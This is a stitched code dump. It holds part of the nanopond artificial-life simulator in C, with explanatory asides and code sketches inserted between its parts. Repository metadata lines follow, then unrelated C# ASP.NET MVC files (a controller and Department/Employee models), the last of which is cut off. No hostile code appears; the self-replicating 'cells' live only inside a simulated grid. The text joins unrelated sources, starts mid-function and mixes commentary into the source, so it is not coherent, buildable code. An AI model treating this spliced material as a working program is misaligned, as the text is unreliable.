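static uint32_t mutationRateFromProbability(double p)
{
    return (uint32_t)(p * 4294967295.0 + 0.5);
}
```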
/* How frequently should random cells / energy be introduced?
* Making this too high makes things very chaotic. Making it too low
* might not introduce enough energy. */
#define INFLOW_FREQUENCY 100
/* Base amount of energy to introduce every INFLOW_FREQUENCY ticks. */
#define INFLOW_RATE_BASE 6000
/* A random amount of energy not bigger than this value will be added to
INFLOW_RATE_BASE. */
#define INFLOW_RATE_VARIATION 8000
/* Size of pond in X and Y dimensions. */
#define POND_SIZE_X 600
#define POND_SIZE_Y 400
/* Depth of pond in four-bit codons -- this is the maximum
* genome size. This *must* be a multiple of 16! */
#define POND_DEPTH 512
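The multiple-of-16 requirement exists, presumably, so that POND_DEPTH_SYSWORDS divides evenly on both 32-bit (8 codons per word) and 64-bit (16 codons per word) machines. It could be guarded at compile time with the classic negative-array-size trick, a sketch:

```c
#include <assert.h>

#define POND_DEPTH 512

/* Fails to compile if POND_DEPTH is not a multiple of 16: the array
 * size would become -1, which is illegal. */
typedef char pond_depth_must_be_multiple_of_16[(POND_DEPTH % 16) ? -1 : 1];
```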
/* Define this to use SDL. To use SDL, you must have SDL headers
* available and you must link with the SDL library when you compile. */
/* Comment this out to compile without SDL visualization support. */
#define USE_SDL 1
/* ----------------------------------------------------------------------- */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef USE_SDL
#ifdef _MSC_VER
#include <SDL.h>
#else
#include <SDL/SDL.h>
#endif /* _MSC_VER */
#endif /* USE_SDL */
/* Pond depth in machine-size words. This is calculated from
* POND_DEPTH and the size of the machine word. (The multiplication
* by two is due to the fact that there are two four-bit values in
* each eight-bit byte.) */
#define POND_DEPTH_SYSWORDS (POND_DEPTH / (sizeof(uintptr_t) * 2))
/* Number of bits in a machine-size word */
#define SYSWORD_BITS (sizeof(uintptr_t) * 8)
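The packing scheme implied by the two macros above — two four-bit values per byte, so `sizeof(uintptr_t) * 2` of them per machine word — can be sketched with a pair of hypothetical accessors (the actual code inlines this shifting directly for speed):

```c
#include <assert.h>
#include <stdint.h>

#define CODONS_PER_WORD (sizeof(uintptr_t) * 2)

/* Read the four-bit value at index i out of a packed genome. */
static uintptr_t codonAt(const uintptr_t *genome, uintptr_t i)
{
    return (genome[i / CODONS_PER_WORD] >> ((i % CODONS_PER_WORD) * 4)) & 0xf;
}

/* Write the four-bit value v at index i into a packed genome. */
static void codonSet(uintptr_t *genome, uintptr_t i, uintptr_t v)
{
    const uintptr_t word = i / CODONS_PER_WORD;
    const uintptr_t shift = (i % CODONS_PER_WORD) * 4;
    genome[word] = (genome[word] & ~((uintptr_t)0xf << shift))
                 | ((v & 0xf) << shift);
}
```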
/* Constants representing neighbors in the 2D grid. */
#define N_LEFT 0
#define N_RIGHT 1
#define N_UP 2
#define N_DOWN 3
/**
* Structure for a cell in the pond
*/
struct Cell
{
/* Globally unique cell ID */
uint64_t ID;
/* ID of the cell's parent */
uint64_t parentID;
/* Generations start at 0 and are incremented from there. */
uintptr_t generation;
/* Energy level of this cell */
uintptr_t energy;
/* Memory space for cell genome (genome is stored as four
* bit instructions packed into machine size words) */
uintptr_t genome[POND_DEPTH_SYSWORDS];
};
/* The pond is a 2D array of cells */
struct Cell pond[POND_SIZE_X][POND_SIZE_Y];
/* This adds to __randCounter so that getRandom() will span
* all 64 bits even if rand() is 32-bit on 64-bit boxes. */
static uintptr_t __randCounter = 0; /* Both of these are set to time() */
static uintptr_t __randState = 0;
/* Note that rand_r() is faster even though we're not multithreaded. If
* you get errors about rand_r not being defined, change it to rand() or
* go find a better PRNG like Mersenne Twister and link against that. */
#define getRandom() (__randCounter += (uintptr_t)rand_r(&__randState))
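The comment above suggests substituting a stronger generator; a minimal xorshift64 sketch (Marsaglia's shift triple 13/7/17) that could stand in for rand_r — the state variable and seed here are illustrative, not part of the original source:

```c
#include <assert.h>
#include <stdint.h>

/* A small xorshift64 PRNG; far better statistical quality than
 * rand_r, and it naturally spans all 64 bits on 64-bit machines.
 * The seed must be nonzero. */
static uint64_t xorshiftState = 88172645463325252ULL;

static uint64_t xorshift64(void)
{
    uint64_t x = xorshiftState;
    x ^= x << 13;
    x ^= x >> 7;
    x ^= x << 17;
    return xorshiftState = x;
}
```

In practice the seed would come from time(), as with __randState.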
enum { MIXED, KINSHIP, MAX_COLOR_SCHEME } color_scheme = MIXED;
char *color_scheme_names[] = {"mixed", "relation-dependent"};
/**
 * Output a line of comma-separated statistics data
*
* @param clock Current clock
*/
static void doReport(const uint64_t clock)
{
static uint64_t lastTotalViableReplicators = 0;
uintptr_t x,y;
uint64_t totalActiveCells = 0;
uint64_t totalEnergy = 0;
uint64_t totalViableReplicators = 0;
uintptr_t maxGeneration = 0;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
struct Cell *const c = &pond[x][y];
if (c->energy) {
++totalActiveCells;
totalEnergy += (uint64_t)c->energy;
if (c->generation > 2)
++totalViableReplicators;
if (c->generation > maxGeneration)
maxGeneration = c->generation;
}
}
}
/* Here are the columns in the CSV output if you're curious */
printf("%llu,%llu,%llu,%llu,%llu\n",
(uint64_t)clock,
(uint64_t)totalEnergy,
(uint64_t)totalActiveCells,
(uint64_t)totalViableReplicators,
(uint64_t)maxGeneration
);
if ((lastTotalViableReplicators > 0)&&(totalViableReplicators == 0))
fprintf(stderr,"[EVENT] Viable replicators have gone extinct. Please reserve a moment of silence.\n");
else if ((lastTotalViableReplicators == 0)&&(totalViableReplicators > 0))
fprintf(stderr,"[EVENT] Viable replicators have appeared!\n");
lastTotalViableReplicators = totalViableReplicators;
}
/**
* Dumps the genome of a cell to a file.
*
* @param file Destination
* @param cell Source
*/
static void dumpCell(FILE *file, struct Cell *cell)
{
uintptr_t wordPtr,shiftPtr,inst,stopCount,i;
if (cell->energy&&(cell->generation > 2)) {
wordPtr = 0;
shiftPtr = 0;
stopCount = 0;
for(i=0;i<POND_DEPTH;++i) {
inst = (cell->genome[wordPtr] >> shiftPtr) & 0xf;
			/* Four STOP instructions in a row mark the end of the genome.
* The probability of this being wrong is *very* small, and
* could only occur if you had four STOPs in a row inside
* a LOOP/REP pair that's always false. In any case, this
* would always result in our *underestimating* the size of
* the genome and would never result in an overestimation. */
fprintf(file,"%x",inst);
if (inst == 0xf) { /* STOP */
if (++stopCount >= 4)
break;
} else stopCount = 0;
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = 0;
shiftPtr = 4;
} else shiftPtr = 0;
}
}
fprintf(file,"\n");
}
}
/**
* Dumps all viable (generation > 2) cells to a file called <clock>.dump
*
* @param clock Clock value
*/
static void doDump(const uint64_t clock)
{
char buf[POND_DEPTH*2];
FILE *d;
uintptr_t x,y;
sprintf(buf,"%llu.dump",clock);
d = fopen(buf,"w");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for writing.\n",buf);
return;
}
fprintf(stderr,"[INFO] Dumping viable cells to %s\n",buf);
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y)
dumpCell(d, &pond[x][y]);
}
fclose(d);
}
/**
* Get a neighbor in the pond
*
* @param x Starting X position
* @param y Starting Y position
* @param dir Direction to get neighbor from
* @return Pointer to neighboring cell
*/
static inline struct Cell *getNeighbor(const uintptr_t x,const uintptr_t y,const uintptr_t dir)
{
/* Space is toroidal; it wraps at edges */
switch(dir) {
case N_LEFT:
return (x) ? &pond[x-1][y] : &pond[POND_SIZE_X-1][y];
case N_RIGHT:
return (x < (POND_SIZE_X-1)) ? &pond[x+1][y] : &pond[0][y];
case N_UP:
return (y) ? &pond[x][y-1] : &pond[x][POND_SIZE_Y-1];
case N_DOWN:
return (y < (POND_SIZE_Y-1)) ? &pond[x][y+1] : &pond[x][0];
}
return &pond[x][y]; /* This should never be reached */
}
/**
* Determines if c1 is allowed to access c2
*
* Access is permitted if:
* c2 has no energy
* c2 has a parent ID of zero
* c2's logo equals c1's "guess"
*
* @param c1 Cell trying to access
* @param c2 Cell being accessed
* @param c1guess c1's "guess"
* @return True or false (1 or 0)
*/
static inline int accessAllowed(struct Cell *const c1,struct Cell *const c2,const uintptr_t c1guess)
{
if (!c2->energy)
return 1;
if (!c2->parentID)
return 1;
if ((c2->genome[0] & 0xf) == (c1guess & 0xf))
return 1;
return 0;
}
#ifdef USE_SDL
/**
* Sets the palette.
*
* The first 64 colors are grays.
* The last 192 colors are a HSV-rainbow.
*/
static void initPalette(SDL_Surface *surface)
{
uintptr_t i,h,f;
SDL_Color palette[256];
/* Make grays. */
for (i=0; i<64;++i) {
f = i * 4;
palette[i].r=f; palette[i].g=f; palette[i].b=f;
}
/* Make rainbow. */
for (i=64;i<256;++i) {
h = (i-64) >> 5;
f = (i-64) & 0x1f;
		if (h&1) f = 0x1f - f; /* descend for odd h; 0x20 - f would overflow the 8-bit channel at f == 0 */
f <<= 3;
switch (h) {
case 0:
palette[i].r=255; palette[i].g=f; palette[i].b=0;
break;
case 1:
palette[i].r=f; palette[i].g=255; palette[i].b=0;
break;
case 2:
palette[i].r=0; palette[i].g=255; palette[i].b=f;
break;
case 3:
palette[i].r=0; palette[i].g=f; palette[i].b=255;
break;
case 4:
palette[i].r=f; palette[i].g=0; palette[i].b=255;
break;
case 5:
palette[i].r=255; palette[i].g=0; palette[i].b=f;
break;
}
}
/* Set palette. */
SDL_SetColors(surface, palette, 0, 256);
}
#endif /* USE_SDL */
/**
* Gets the color that a cell should be
*
* This is only used if SDL is enabled.
*
* The colors are determined according to different color schemes. (The
* schemes can be switched with the right mouse button.)
*
* @param c Cell to get color for
* @return 8-bit color value
*/
static inline Uint8 getColor(struct Cell *c)
{
uintptr_t sum,i,j,word,opcode;
switch (color_scheme) {
case MIXED:
/*
* For cells of generation > 1, saturation and value are set to maximum.
* The hue will be (usually) different even for slightly differing genomes.
*
* A cell with generation <= 1 is gray, the lightness depending on its
* energy. Cells with no energy are black.
*/
if (c->energy) {
if (c->generation > 1) {
sum = 0;
for(i=0;i<POND_DEPTH_SYSWORDS&&(c->genome[i] != ~((uintptr_t)0));++i)
sum += c->genome[i];
j = 0;
for(i=0;i<sizeof(uintptr_t);++i) {
j ^= sum & 0xff;
sum >>= 8;
}
return (j % 192) + 64;
}
return (c->energy * 64) / (INFLOW_RATE_BASE + INFLOW_RATE_VARIATION);
}
return 0;
case KINSHIP:
/*
* For cells of generation > 1, saturation and value are set to maximum.
* Hue is a hash-value with the property that related genomes will have
* similar hue (but of course, as this is a hash function, totally
* different genomes can also have a similar or even the same hue).
		 * Therefore the difference in hue should, to some extent, reflect the
		 * degree of "kinship" between two cells.
*
* A cell with generation <= 1 is gray, the lightness depending on its
* energy. Cells with no energy are black.
*/
if (c->energy) {
if (c->generation > 1) {
sum = 0;
for(i=0;i<POND_DEPTH_SYSWORDS&&(c->genome[i] != ~((uintptr_t)0));++i) {
word=c->genome[i];
for(j=0;j<SYSWORD_BITS/4;++j,word >>= 4) {
/* We ignore 0xf's here, because otherwise very similar genomes
* might get quite different hash values in the case when one of
					 * the genomes is slightly longer and uses one more machine
* word. */
opcode = word & 0xf;
if (opcode == 0xf) continue;
sum += opcode;
}
}
				/* The hash value is the sum of all non-STOP instructions,
				 * folded into the 192-entry rainbow band of the palette. */
return (sum % 192) + 64;
}
return (c->energy * 64) / (INFLOW_RATE_BASE + INFLOW_RATE_VARIATION);
}
return 0;
case MAX_COLOR_SCHEME:
/* Suppress warning. */
return 0;
}
return 0;
}
/**
* Main method
*
* @param argc Number of args
* @param argv Argument array
*/
int main(int argc,char **argv)
{
uintptr_t i;
/* Buffer used for execution output of candidate offspring */
uintptr_t outputBuf[POND_DEPTH_SYSWORDS];
/* Seed and init the random number generator */
__randCounter = __randState = time(NULL);
for(i=0;i<1024;++i)
getRandom();
/* Set up SDL if we're using it */
#ifdef USE_SDL
SDL_Surface *screen;
SDL_Event sdlEvent;
if (SDL_Init(SDL_INIT_VIDEO) < 0 ) {
fprintf(stderr,"*** Unable to init SDL: %s ***\n",SDL_GetError());
exit(1);
}
atexit(SDL_Quit);
SDL_WM_SetCaption("nanopond","nanopond");
screen = SDL_SetVideoMode(POND_SIZE_X,POND_SIZE_Y,8,SDL_SWSURFACE);
if (!screen) {
fprintf(stderr, "*** Unable to create SDL window: %s ***\n", SDL_GetError());
exit(1);
}
const uintptr_t sdlPitch = screen->pitch;
initPalette(screen);
#endif /* USE_SDL */
/* Clear the pond */
for(i=0;i<sizeof(pond);++i)
((uint8_t *)&pond)[i] = (uint8_t)0;
/* Clock is incremented on each core loop */
uint64_t clock = 0;
/* This is used to generate unique cell IDs */
uint64_t cellIdCounter = 0;
/* Miscellaneous variables used in the loop */
uintptr_t currentWord,wordPtr,shiftPtr,inst,x,y,tmp;
struct Cell *pptr,*tmpptr;
/* Virtual machine memory pointer register (which
* exists in two parts... read the code below...) */
uintptr_t ptr_wordPtr;
uintptr_t ptr_shiftPtr;
/* "Spare" register that can be swapped to/from */
uintptr_t sptr_wordPtr;
uintptr_t sptr_shiftPtr;
/* The main "register" */
uintptr_t reg;
/* Which way is the cell facing? */
uintptr_t facing;
/* Virtual machine loop/rep stack */
uintptr_t loopStack_wordPtr[POND_DEPTH];
uintptr_t loopStack_shiftPtr[POND_DEPTH];
uintptr_t loopStackPtr;
/* If this is nonzero, we're skipping to matching REP */
/* It is incremented to track the depth of a nested set
* of LOOP/REP pairs in false state. */
uintptr_t falseLoopDepth;
/* If this is nonzero, execution stops. This allows us
* to avoid the ugly use of a goto to exit the loop. :) */
int stop;
/* Main loop */
for(;;) {
/* Increment clock and run reports periodically */
/* Clock is incremented at the start, so it starts at 1 */
if (!(++clock % REPORT_FREQUENCY)) {
doReport(clock);
/* SDL display is also refreshed every REPORT_FREQUENCY */
#ifdef USE_SDL
while (SDL_PollEvent(&sdlEvent)) {
if (sdlEvent.type == SDL_QUIT) {
fprintf(stderr,"[QUIT] Quit signal received!\n");
exit(0);
}
if (sdlEvent.type == SDL_MOUSEBUTTONDOWN) {
switch (sdlEvent.button.button) {
case SDL_BUTTON_LEFT:
fprintf(stderr,"[INTERFACE] Genome of cell at (%d, %d):\n",
sdlEvent.button.x, sdlEvent.button.y);
dumpCell(stderr, &pond[sdlEvent.button.x][sdlEvent.button.y]);
break;
case SDL_BUTTON_RIGHT:
/* Switch color scheme. */
{
uintptr_t x, y;
color_scheme = (color_scheme + 1) % MAX_COLOR_SCHEME;
fprintf(stderr,"[INTERFACE] Switching to color scheme \"%s\".\n",
color_scheme_names[color_scheme]);
for (y=0;y<POND_SIZE_Y;++y)
for (x=0;x<POND_SIZE_X;++x) {
((uint8_t *)screen->pixels)[x + (y * sdlPitch)]
= getColor(&pond[x][y]);
}
break;
}
}
}
}
SDL_UpdateRect(screen,0,0,POND_SIZE_X,POND_SIZE_Y);
#endif /* USE_SDL */
}
/* Periodically dump the viable population if defined */
#ifdef DUMP_FREQUENCY
if (!(clock % DUMP_FREQUENCY))
doDump(clock);
#endif /* DUMP_FREQUENCY */
/* Introduce a random cell somewhere with a given energy level */
/* This is called seeding, and introduces both energy and
* entropy into the substrate. This happens every INFLOW_FREQUENCY
* clock ticks. */
if (!(clock % INFLOW_FREQUENCY)) {
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
pptr->ID = ++cellIdCounter;
pptr->parentID = 0;
pptr->generation = 0;
pptr->energy += INFLOW_RATE_BASE + (getRandom() % INFLOW_RATE_VARIATION);
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
pptr->genome[i] = getRandom();
/* If enabled, make this a synthetic replicator every once in a while.
* This is mainly just for debugging and is normally not defined. */
#ifdef SYNTHETIC_REPLICATOR
if ((getRandom() & 0xffff) < 3) {
/* These digits constitute a very simple self-replicating loop. */
pptr->genome[0] = 0x0a185933;
fprintf(stderr,"[INFO] Dropped a synthetic replicator!\n");
}
#endif /* SYNTHETIC_REPLICATOR */
/* Update the random cell on SDL screen if viz is enabled */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(&pond[x][y]);
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
/* Pick a random cell to execute */
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
/* Reset the state of the VM prior to execution */
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
outputBuf[i] = ~((uintptr_t)0); /* ~0 == 0xfffff... */
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
sptr_wordPtr = 0;
sptr_shiftPtr = 0;
reg = 0;
loopStackPtr = 0;
wordPtr = 0;
shiftPtr = 4; /* The first four bits are the 'logo' and are skipped! */
facing = getRandom() & 3; /* Cells start facing in a random direction */
falseLoopDepth = 0;
stop = 0;
/* We use a currentWord buffer to hold the word we're
* currently working on. This speeds things up a bit
* since it eliminates a pointer dereference in the
* inner loop. We have to be careful to refresh this
* whenever it might have changed... take a look at
* the code. :) */
currentWord = pptr->genome[0];
/* Core execution loop */
while (pptr->energy&&(!stop)) {
/* Get the next instruction */
inst = (currentWord >> shiftPtr) & 0xf;
/* Randomly frob either the instruction or the register with a
* probability defined by MUTATION_RATE. This introduces variation,
* and since the variation is introduced into the state of the VM
* it can have all manner of different effects on the end result of
* replication: insertions, deletions, duplications of entire
* ranges of the genome, etc. */
tmp = getRandom(); /* Call getRandom() only once for speed */
if ((tmp & 0xffffffff) < MUTATION_RATE) {
if (tmp & 0x80) /* Check for the 8th bit to get random boolean */
inst = tmp & 0xf; /* Only the first four bits are used here */
else reg = tmp & 0xf;
}
/* Each instruction processed costs one unit of energy */
--pptr->energy;
/* Execute the instruction */
if (falseLoopDepth) {
/* Skip forward to matching REP if we're in a false loop. */
				if (inst == 0x9) /* Nested LOOP: increment false loop depth */
					++falseLoopDepth;
				else if (inst == 0xa) /* REP: decrement false loop depth */
					--falseLoopDepth;
} else {
/* If we're not in a false LOOP/REP, execute normally */
switch(inst) {
case 0x0: /* NOP: No operation */
break;
case 0x1: /* FWD: Increment the pointer (wrap at end) */
if ((ptr_shiftPtr += 4) >= SYSWORD_BITS) {
if (++ptr_wordPtr >= POND_DEPTH_SYSWORDS)
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
}
break;
case 0x2: /* BACK: Decrement the pointer (wrap at beginning) */
if (ptr_shiftPtr)
ptr_shiftPtr -= 4;
else {
if (ptr_wordPtr)
--ptr_wordPtr;
else ptr_wordPtr = POND_DEPTH_SYSWORDS - 1;
ptr_shiftPtr = SYSWORD_BITS - 4;
}
break;
case 0x3: /* INC: Increment the register */
reg = (reg + 1) & 0xf;
break;
case 0x4: /* DEC: Decrement the register */
reg = (reg - 1) & 0xf;
break;
case 0x5: /* READG: Read into the register from genome */
reg = (pptr->genome[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x6: /* WRITEG: Write out from the register to genome */
pptr->genome[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
pptr->genome[ptr_wordPtr] |= reg << ptr_shiftPtr;
currentWord = pptr->genome[wordPtr]; /* Must refresh in case this changed! */
break;
case 0x7: /* READB: Read into the register from buffer */
reg = (outputBuf[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x8: /* WRITEB: Write out from the register to buffer */
outputBuf[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
outputBuf[ptr_wordPtr] |= reg << ptr_shiftPtr;
break;
case 0x9: /* LOOP: Jump forward to matching REP if register is zero */
if (reg) {
if (loopStackPtr >= POND_DEPTH)
stop = 1; /* Stack overflow ends execution */
else {
loopStack_wordPtr[loopStackPtr] = wordPtr;
loopStack_shiftPtr[loopStackPtr] = shiftPtr;
++loopStackPtr;
}
} else falseLoopDepth = 1;
break;
case 0xa: /* REP: Jump back to matching LOOP if register is nonzero */
if (loopStackPtr) {
--loopStackPtr;
if (reg) {
wordPtr = loopStack_wordPtr[loopStackPtr];
shiftPtr = loopStack_shiftPtr[loopStackPtr];
currentWord = pptr->genome[wordPtr];
/* This ensures that the LOOP is rerun */
continue;
}
}
break;
case 0xb: /* TURN: Turn in the direction specified by register */
facing = reg & 3;
break;
case 0xc: /* SWAP: Swap active and saved copies of pointer */
tmp = ptr_wordPtr;
ptr_wordPtr = sptr_wordPtr;
sptr_wordPtr = tmp;
tmp = ptr_shiftPtr;
ptr_shiftPtr = sptr_shiftPtr;
sptr_shiftPtr = tmp;
break;
case 0xd: /* SET: Skip next instruction and set register equal to it */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = 0;
shiftPtr = 4;
							} else shiftPtr = 0; /* only word 0 carries the logo */
currentWord = pptr->genome[wordPtr];
}
reg = (pptr->genome[wordPtr] >> shiftPtr) & 0xf;
break;
case 0xe: /* SHARE: Attempt to share energy (50-50) with neighbor */
tmpptr = getNeighbor(x,y,facing);
if (accessAllowed(pptr,tmpptr,reg)) {
tmp = pptr->energy + tmpptr->energy;
tmpptr->energy = tmp / 2;
pptr->energy = tmp - tmpptr->energy;
}
break;
case 0xf: /* STOP: End execution */
stop = 1;
break;
}
}
/* Advance the shift and word pointers, and loop around
* to the beginning at the end of the genome. */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = 0;
shiftPtr = 4; /* Remember: first four bits are the 'logo' */
} else shiftPtr = 0;
currentWord = pptr->genome[wordPtr];
}
}
/* Copy outputBuf into neighbor if access is permitted and there
* is energy there to make something happen. There is no need
* to copy to a cell with no energy, since anything copied there
* would never be executed and then would be replaced with random
* junk eventually. See the seeding code in the main loop above. */
if ((outputBuf[0] & 0xff) != 0xff) {
tmpptr = getNeighbor(x,y,facing);
if ((tmpptr->energy)&&accessAllowed(pptr,tmpptr,reg)) {
tmpptr->ID = ++cellIdCounter;
tmpptr->parentID = pptr->ID;
tmpptr->generation = pptr->generation + 1;
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
tmpptr->genome[i] = outputBuf[i];
}
}
/* Update the neighborhood on SDL screen to show any changes. */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
if (x) {
((uint8_t *)screen->pixels)[(x-1) + (y * sdlPitch)] = getColor(&pond[x-1][y]);
if (x < (POND_SIZE_X-1))
((uint8_t *)screen->pixels)[(x+1) + (y * sdlPitch)] = getColor(&pond[x+1][y]);
else ((uint8_t *)screen->pixels)[y * sdlPitch] = getColor(&pond[0][y]);
} else {
((uint8_t *)screen->pixels)[(POND_SIZE_X-1) + (y * sdlPitch)] = getColor(&pond[POND_SIZE_X-1][y]);
((uint8_t *)screen->pixels)[1 + (y * sdlPitch)] = getColor(&pond[1][y]);
}
if (y) {
((uint8_t *)screen->pixels)[x + ((y-1) * sdlPitch)] = getColor(&pond[x][y-1]);
if (y < (POND_SIZE_Y-1))
((uint8_t *)screen->pixels)[x + ((y+1) * sdlPitch)] = getColor(&pond[x][y+1]);
else ((uint8_t *)screen->pixels)[x] = getColor(&pond[x][0]);
} else {
((uint8_t *)screen->pixels)[x + ((POND_SIZE_Y-1) * sdlPitch)] = getColor(&pond[x][POND_SIZE_Y-1]);
((uint8_t *)screen->pixels)[x + sdlPitch] = getColor(&pond[x][1]);
}
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
}
|
32a2d848f4dc28017f98782f317c32a11930584f
|
[
"C",
"Makefile",
"Ruby",
"Shell"
] | 7 |
C
|
adamierymenko/nanopond
|
77b9c4ae49a03a0c5ef9829effd1e2bb6b495fb2
|
4e6aeb48a02151f0dc5b64adcf648660ccd9a945
|
refs/heads/master
|
<repo_name>StackStorm-Exchange/stackstorm-astral<file_sep>/actions/lib/action.py
"""
Copyright 2016 Brocade Communications Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from st2common.runners.base_action import Action
try:
# The astral module was broken up into a package in astral 2.0, so use
# the updated import
from astral.location import Location
except ImportError:
# Astral only installs <1.10 for Python < 3, so use the old import
from astral import Location
class BaseAction(Action):
def __init__(self, config):
super(BaseAction, self).__init__(config)
self._latitude = self.config['latitude']
self._longitude = self.config['longitude']
self._timezone = self.config['timezone']
location = Location(('name', 'region', float(self._latitude),
float(self._longitude), self._timezone, 0))
self.sun = location.sun()
<file_sep>/sensors/astral_sun_sensor.py
from st2reactor.sensor.base import PollingSensor
import st2common.util.date as date
try:
# The astral module was broken up into a package in astral 2.0, so use
# the updated import
from astral.location import Location
except ImportError:
# Astral only installs <1.10 for Python < 3, so use the old import
from astral import Location
__all__ = [
'AstralSunSensor'
]
class AstralSunSensor(PollingSensor):
def __init__(self, sensor_service, config=None, poll_interval=None):
super(AstralSunSensor, self).__init__(sensor_service=sensor_service,
config=config,
poll_interval=poll_interval)
self._logger = self._sensor_service.get_logger(__name__)
def setup(self):
self._latitude = self._config['latitude']
self._longitude = self._config['longitude']
self._update_sun_info()
self._update_counter = 0
def poll(self):
if self._update_counter > 60:
self._update_sun_info()
self._update_counter = 0
checks = ['dawn', 'sunrise', 'sunset', 'dusk']
currenttime = date.get_datetime_utc_now()
self._logger.debug("Checking current time %s for sun information" %
str(currenttime))
for key in checks:
if self.is_within_minute(self.sun[key], currenttime):
trigger = 'astral.' + key
self.sensor_service.dispatch(trigger=trigger, payload={})
self._update_counter += 1
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _update_sun_info(self):
location = Location(('name', 'region', float(self._latitude),
float(self._longitude), 'GMT+0', 0))
self.sun = location.sun()
def is_within_minute(self, time1, time2):
timediff = time1 - time2
diff = abs(timediff.total_seconds() // 60)
if diff < 1:
return True
return False
<file_sep>/CHANGES.md
# Change Log
## 1.0.0
* Drop Python 2.7 support
# 0.2.2
- Add explicit support for Python 2 and 3
- Fix import for astral 2+ (available on Python 3.6+ only)
# 0.2.0
- Updated action `runner_type` from `run-python` to `python-script`
<file_sep>/README.md
# Astral Pack
This pack provides a sensor with four triggers for initiating workflows based
on sun position for a geo lat/long coordinates:
### Configuration file:
Copy and edit the astral.yaml.example into the /opt/stackstorm/configs directory.
**Note** : When modifying the configuration in `/opt/stackstorm/configs/` please
remember to tell StackStorm to load these new values by running
`st2ctl reload --register-configs`
### Triggers:
```text
astral.dawn
astral.sunrise
astral.sunset
astral.dusk
```
### Actions:
#### get_dawn
Returns the time in the morning when the sun is a specific number of degrees below the horizon in UTC for the current day.
#### get_sunrise
Returns the time in the morning when the top of the sun breaks the horizon in UTC for the current day
#### get_sunset
Returns the time in the evening when the sun is about to disappear below the horizon in UTC for the current day
#### get_dusk
Returns the time in the evening when the sun is a specific number of degrees below the horizon in UTC for the current day.
|
f1d80a942dfa69c1162df2625d14ad6adda0b797
|
[
"Markdown",
"Python"
] | 4 |
Python
|
StackStorm-Exchange/stackstorm-astral
|
b1540cece62bc7c80255cd38a9a07e632e865f97
|
f4bbed895b9db416a461212033ec8f863e06b683
|
refs/heads/master
|
<repo_name>AirN05/ASP.NET<file_sep>/1lab/WebApplication1/Controllers/HomeController.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Mvc;
using WebApplication1.Models;
using System.Web.Security;
namespace WebApplication1.Controllers
{
public class HomeController : Controller
{
public ActionResult Index()
{
return View();
}
public ActionResult About()
{
ViewBag.Message = "Your application description page.";
return View();
}
public ActionResult Contact()
{
ViewBag.Message = "Your contact page.";
return View();
}
public ActionResult myHierarchy()
{
List<Department> depts = new List<Department>();
for (int i = 0; i < 3; i++)
{
List<Employee> employees = new List<Employee>();
for (int j = 0; j < 3; j++)
{
Employee emp = new Employee("Александр."+j+"."+i, j+i, "444"+i+j);
employees.Add(emp);
}
Department dept = new Department("dept" + i, i, "street" + i, "8800555353" + i, employees, null);
depts.Add(dept);
}
Employee emp1 = new Employee("Саша.А.А.", 5, "44467");
List<Employee> employees1 = new List<Employee>();
employees1.Add(emp1);
Department dept1 = new Department("deptMain", 0, "streetMain", "8800555353", employees1, depts);
return View(dept1);
}
[HttpPost]
[ValidateAntiForgeryToken]
public ActionResult About(User modelUser)
{
if (ModelState.IsValid)
{
if (FormsAuthentication.Authenticate(modelUser.login, modelUser.password))
{
FormsAuthentication.SetAuthCookie(modelUser.login, false);
return View(modelUser);
}
else
{
ModelState.AddModelError("", "The user name or password provided is incorrect.");
}
}
return View(modelUser);
}
}
}<file_sep>/1lab/WebApplication1/Models/Department.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
namespace WebApplication1.Models
{
public class Department
{
public string name { get; set; }
public int count { get; set; }
public string address { get; set; }
public string depPhone { get; set; }
public List<Employee> employees { get; set; }
public List<Department> subDept { get; set; }
public Department( string name, int count, string address, string depPhone, List<Employee> employees, List<Department> subDept)
{
this.name = name;
this.count = count;
this.address = address;
this.depPhone = depPhone;
this.employees = employees;
this.subDept = subDept;
}
}
}<file_sep>/1lab/WebApplication1/Models/Employee.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
namespace WebApplication1.Models
{
public class Employee
{
